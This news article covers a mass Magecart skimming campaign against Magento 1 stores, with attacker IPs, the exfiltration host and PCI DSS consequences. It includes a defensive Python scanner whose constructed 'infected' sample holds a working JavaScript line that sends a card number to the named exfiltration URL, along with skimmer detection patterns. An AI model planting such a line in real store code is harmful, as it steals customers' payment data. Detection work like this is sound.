Over the weekend, more than 2,000 Magento stores across the world were hacked in the largest documented campaign of its kind to date. These attacks resemble the "Magecart" style, in which attackers compromise an online shopping cart, generally with only a few lines of code, which are then used to skim the card details users enter. The details are sent to a command-and-control server belonging to the criminals, who can sell them on the dark web or use them to purchase items fraudulently.
Sansec, a security firm that specializes in Magecart attacks, confirmed over 2,000 Magento compromises over the weekend. It released a report detailing the incident, according to which the attack targeted stores using the no-longer-supported Magento version 1, whose discontinuation Adobe, the owner and distributor of the platform, announced in June of last year. The report also states that a total of 1,904 stores were infected with a unique keylogger that stole card data from the checkout pages used by the online stores.
Most of the compromised stores have no history of prior security incidents, so the attackers may have used an entirely new attack method to gain access to the stores' servers. This new method not only granted them access to the data but also let them write new code into the checkout pages. It is likely that some unknown exploit was used, probably bought from an underground hacking forum.
Sansec notes, “While we are still investigating the exact vector, this campaign may be related to a recent Magento 1 0day (exploit) that was put up for sale a few weeks ago. User z3r0day announced on a hacking forum to sell a Magento 1 “remote code execution” exploit method, including instruction video, for $5000. Allegedly, no prior Magento admin account is required. Seller z3r0day stressed that – because Magento 1 is End-Of-Life – no official patches will be provided by Adobe to fix this bug, which renders this exploit extra damaging to store owners using the legacy platform. To sweeten the deal, z3r0day pledged to only sell 10 copies of the dangerous exploit.”
The attackers used the IPs 220.127.116.11 (US) and 18.104.22.168 (OVH, FR) to interact with the Magento admin, and the Magento Connect feature allowed them to download and install various files, including the malware file mysql.php. This malicious file was deleted automatically once its code had been added to the prototype.js file used by Magento.
Researchers noted that a number of attempts were made to install files over the weekend, possibly to install an improved version of the skimmer. This skimmer was also installed in the prototype.js file and executed whenever the checkout page referenced it. The attack was used to steal credit card information and, later on, to redirect payments. The researchers managed to trace where the payment data was being exfiltrated to: the same Moscow-hosted site at hxxps://imags.pw/502.jsp where the keylogger is stored.
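As an added defender-side example (not Sansec's tooling or code from the report), the following Python script checks the contents of a Magento 1 prototype.js against a known-good hash and flags references to the exfiltration host named above, to any host outside an assumed allowlist, and to payment field names combined with outbound request code; the allowlist entry and both sample files are constructed.

```python
import hashlib
import re
from typing import List, Optional

# Indicators taken from the article: the host the skimmer sent card data to and
# the Magento file the skimmer code was appended to (prototype.js).
EXFIL_HOST = "imags.pw"
# Assumption: the only external hosts your own prototype.js should ever name.
ALLOWED_HOSTS = {"shop.example.test"}

URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)
PAYMENT_FIELD_RE = re.compile(r"cc_number|cc_cid|cvv|card_number", re.IGNORECASE)
OUTBOUND_RE = re.compile(r"new Image\(\)\.src|sendBeacon|fetch\(|XMLHttpRequest")


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def scan_js(content: str, baseline_sha256: Optional[str] = None) -> List[str]:
    """Return human-readable findings for one JavaScript file's contents."""
    findings = []
    # A hash taken from a clean Magento 1 install is the strongest signal.
    if baseline_sha256 and sha256_hex(content.encode()) != baseline_sha256:
        findings.append("content differs from known-good baseline hash")
    for host in sorted(set(h.lower() for h in URL_RE.findall(content))):
        if host == EXFIL_HOST:
            findings.append(f"references known exfiltration host {host}")
        elif host not in ALLOWED_HOSTS:
            findings.append(f"references unexpected external host {host}")
    # Stock prototype.js uses XMLHttpRequest for Ajax but never names payment
    # fields, so only the combination of both is treated as a skimmer heuristic.
    if PAYMENT_FIELD_RE.search(content) and OUTBOUND_RE.search(content):
        findings.append("payment field names combined with outbound request code")
    return findings


# Constructed samples (not real Magento code): a clean stub, and the same stub
# with a skimmer line appended that posts the card number to the exfil host.
CLEAN_JS = ("/* Prototype JavaScript framework */\n"
            "var Prototype = {Version: '1.7'};\n"
            "Ajax.Request = function(){ return new XMLHttpRequest(); };\n")
INFECTED_JS = CLEAN_JS + (
    "var c=document.querySelector('#cc_number');"
    "new Image().src='https://imags.pw/502.jsp?d='+encodeURIComponent(c.value);\n")

if __name__ == "__main__":
    baseline = sha256_hex(CLEAN_JS.encode())
    print("clean:", scan_js(CLEAN_JS, baseline))      # []
    print("infected:", scan_js(INFECTED_JS, baseline))  # three findings
```

In a real deployment the baseline hash should come from a pristine copy of the same Magento release, and the script should be run over every prototype.js under the store's document root.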
Officially, Magento 1 was labeled end-of-life from 2020, so Adobe no longer supplies updates for it, as with all its end-of-life products. Customers were, however, notified of the situation and told to migrate to version 2. At that time, an estimated 270,000 stores were running version 1. At the end of 2019, this number was found to be between 200,000 and 240,000, and it was approximately 110,000 at the end of June when Adobe officially announced end-of-life. The company had meanwhile pushed the date back twice because of the slow migration to version 2. Of those hundreds of thousands of vulnerable stores, many experience low traffic volumes, which means they would not be worth a hacker's time.
As it falls on the end user or customer to guard against Magecart attackers, here is the first preventative advice given when the first arrests associated with Magecart attacks were made, in Indonesia in 2020:
“To avoid big financial losses due to JS-sniffers [Magecart-style attacks], it’s recommended for online users to have a separate pre-paid card for online payments, set spending limits on cards used for online shopping, or even use a separate bank account exclusively for online purchases. Online merchants, in their turn, need to keep their software updated and carry out regular cybersecurity assessments of their websites.”
MasterCard and Visa issued alerts because of the slow shift to version 2. Visa warned that if online shop owners did not migrate to version 2, they could be found non-compliant with PCI DSS, which governs how card data is handled by merchants and financial institutions. This is very damaging, as they could become directly liable for the damages caused to their customers.
Mastercard's alert, meanwhile, noted that 77% of all web skimming incidents involved companies that were not in compliance with PCI DSS requirement 6, the rule that requires store owners to run up-to-date systems. Non-compliance with the standard has several other drawbacks for online store owners, including monthly penalties that can range from 5,000 USD to 100,000 USD depending on the category of business. Also, if a breach occurs and the business is deemed non-compliant, the following penalties can be meted out:
· Fines of 50 USD to 90 USD per cardholder whose information was endangered,
· Termination of the relationship between the company and its payment processor,
· Customers can bring civil suits against the business.
So, if you are still using version 1, it is time to move to Magento version 2, as the unknown exploit being used will not be patched.